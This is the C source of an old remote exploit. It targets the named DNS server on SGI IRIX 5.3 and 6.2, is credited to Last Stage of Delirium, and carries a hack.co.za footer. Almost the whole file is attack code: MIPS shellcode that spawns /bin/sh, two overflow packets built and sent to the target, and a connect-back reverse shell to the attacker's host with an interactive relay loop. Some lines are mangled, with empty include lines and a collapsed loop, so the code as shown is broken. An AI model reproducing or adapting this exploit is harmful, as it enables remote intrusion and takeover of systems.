/* Copyright (c) May 1998 Last Stage of Delirium */ /* THIS IS UNPUBLISHED PROPRIETARY SOURCE CODE OF[2000]*/ /* Last Stage of Delirium [2000]*/ /* [2000]*/ /* The contents of this file may be disclosed to third */ /* parties, copied and duplicated in any form, in whole */ /* or in part, without the prior written consent of LsD. */ /* SGI named remote overflow exploit [2000]*/ /* tested on IRIX 5.3 and 6.2 including multiprocessor and */ /* multicache machines [2000]*/ /* won't work on IRIX64 6.2 since its named binary seems to */ /* be not vulnerable to the iquery overflow [2000]*/ /* usage ./r local_adr local_port target [2000]*/ /* you must specify the local_adr and local_port since[2000]*/ /* the remote shell is a connecting shell not a classic */ /* bind shell (it connects with the local machine) [2000]*/ #include #include #include #include #include #include #include #include #define START_ADR 0x10040100 #define PUTADR(p,adr) {*p=(adr>>24)&0xff;*(p+1)=(adr>>16)&0xff;*(p+2)=(adr>>8)&0xff;*(p+3)=adr&0xff;} #define PUTADRH(p,adr) {*p=(adr>>24)&0xff;*(p+1)=(adr>>16)&0xff;} #define PUTADRL(p,adr) {*p=(adr>>8)&0xff;*(p+1)=adr&0xff;} char tablica[25]={ 0x00,0x00,0x34,0x34,0x09,0x80,0x00,0x00, 0x00,0x01,0x00,0x00,0x00,0x00,0x00,0x00, 0x01,0x00,0x01,0x20,0x20,0x20,0x20,0x00,0x00}; char asmcode[]={ 0x24,0x04,0x00,0x02,0x24,0x05,0x00,0x02,0x24,0x06,0x00,0x00,0x24,0x02,0x04,0x53, 0x00,0x00,0x00,0x0c,0x00,0x00,0x00,0x00,0x00,0x40,0x80,0x25,0x00,0x40,0x20,0x25, 0x3c,0x05,0x10,0x04,0x34,0xa5,0xff,0xff,0x24,0x06,0x00,0x10,0x24,0x02,0x04,0x43,0x00,0x00,0x00,0x0c,0x00,0x00,0x00,0x00,0x24,0x02,0x03,0xee,0x24,0x04,0x00,0x00,0x00,0x00,0x00,0x0c,0x00,0x00,0x00,0x00,0x24,0x02,0x03,0xee,0x24,0x04,0x00,0x01,0x00,0x00,0x00,0x0c,0x00,0x00,0x00,0x00,0x24,0x02,0x03,0xee,0x24,0x04,0x00,0x02,0x00,0x00,0x00,0x0c,0x00,0x00,0x00,0x00,0x02,0x00,0x20,0x25,0x24,0x02,0x04,0x11,0x00,0x00,0x00,0x0c,0x00,0x00,0x00,0x00,0x02,0x00,0x20,0x25,0x24,0x02,0x04,0x11,0x00,0x00,0x00,0x0c,0x00,0x00,0x00,0x00,0x02,0x00,0x20,0x25,0x24,0x02,0x04,0x11,0x00,0x00,0x00,0x0c,0x00,0x00,0x00,0x00,0x3c,0x04,0x10,0x01,0x34,0x84,0xff,0xf1,0x3c,0x05,0x10,0x02,0x34,0xa5,0xff,0xf2,0x24,0x02,0x03,0xf3,0x00,0x00,0x00,0x0c,0x00,0x00,0x00,0x00, '/','b','i','n','/','s','h',0, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x02,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00 }; main(int argc,char **argv) { int sck,i,srvsck; fd_set readfs; struct sockaddr_in address; struct sockaddr_in local; struct hostent *hp; int size; unsigned long lregt9,lreggp,lstart,lbcop7,ltmp; char regt9[4],reggp[4],start[4],bcop7[4]; char *b,*p; printf("IRIX named remote exploit\n"); printf("Last Stage of Delirium, May 1998, Poland\n\n"); if(argc!=4) { printf("usage: %s local_adr local_port target\n",argv[0]); exit(1); } srvsck=socket(AF_INET,SOCK_STREAM,0); bzero(&local,sizeof(local)); local.sin_family=AF_INET; local.sin_port=htons(atoi(argv[2])); if((local.sin_addr.s_addr=inet_addr(argv[1]))==-1) { if((hp=gethostbyname(argv[1]))==NULL) { printf("error: address.\n"); exit(-1); } memcpy(&local.sin_addr.s_addr,hp->h_addr,4); } if (bind(srvsck,(struct sockaddr *)&local,sizeof(local))<0) { perror("error"); exit(-1); } lbcop7=lregt9=START_ADR; lstart=START_ADR+0x14; lreggp=START_ADR+0x8024; PUTADR(regt9,lregt9); PUTADR(reggp,lreggp); PUTADR(start,lstart); PUTADR(bcop7,lbcop7); ltmp=START_ADR+0xd8; PUTADRH(&asmcode[0x34-20+2],ltmp); PUTADRL(&asmcode[0x38-20+2],ltmp); ltmp=START_ADR+0xc8; PUTADRH(&asmcode[0xa8-20+2+4],ltmp); PUTADRL(&asmcode[0xac-20+2+4],ltmp); PUTADR(&asmcode[0xcc-20+4],ltmp); ltmp=START_ADR+0xd0; PUTADRH(&asmcode[0xb0-20+2+4],ltmp); PUTADRL(&asmcode[0xb4-20+2+4],ltmp); ltmp=local.sin_addr.s_addr; PUTADR(&asmcode[0xdc-20],ltmp); ltmp=local.sin_port; PUTADRL(&asmcode[0xda-20],ltmp); size=930; tablica[0]=(size+23)>>8; tablica[1]=(size+23)&0xff; tablica[23]=size>>8; tablica[24]=size&0xff; if((b=(char*)malloc(10500))==NULL) return(-1); memset(b,0,10500); bcopy(tablica,b,sizeof(tablica)); for(i=0;ih_addr,4); } if(connect(sck,(struct sockaddr *)&address,sizeof(address))<0) { perror("error"); exit(-1); } fflush(stdout); write(sck,b,25+size); close(sck); size=10000; b[0]=(size+23)>>8; b[1]=(size+23)&0xff; b[23]=size>>8; b[24]=size&0xff; sck=socket(AF_INET,SOCK_STREAM,0); sleep(1); if(connect(sck,(struct sockaddr *)&address,sizeof(address))<0) { perror("error"); exit(-1); } fflush(stdout); write(sck,b,25+size); close(sck); listen(srvsck,5); srvsck=accept(srvsck,(struct sockaddr*)&local,&i); printf("%s successfully exploited\n",argv[3]); fflush(stdout); while(1) { FD_ZERO(&readfs); FD_SET(0,&readfs); FD_SET(srvsck,&readfs); if(select(FD_SETSIZE,&readfs,NULL,NULL,NULL)) { int cnt; char buf[1024]; if(FD_ISSET(0,&readfs)) { if((cnt=read(0,buf,1024))<1) { if(errno==EWOULDBLOCK||errno==EAGAIN) continue; else { printf("koniec.\n"); exit(-1); } } write(srvsck,buf,cnt); } if(FD_ISSET(srvsck,&readfs)) { if((cnt=read(srvsck,buf,1024))<1) { if(errno==EWOULDBLOCK||errno==EAGAIN) continue; else { printf("koniec.\n"); exit(-1); } } write(1,buf,cnt); } } } free(b); close(srvsck); } /* www.hack.co.za [2000]*/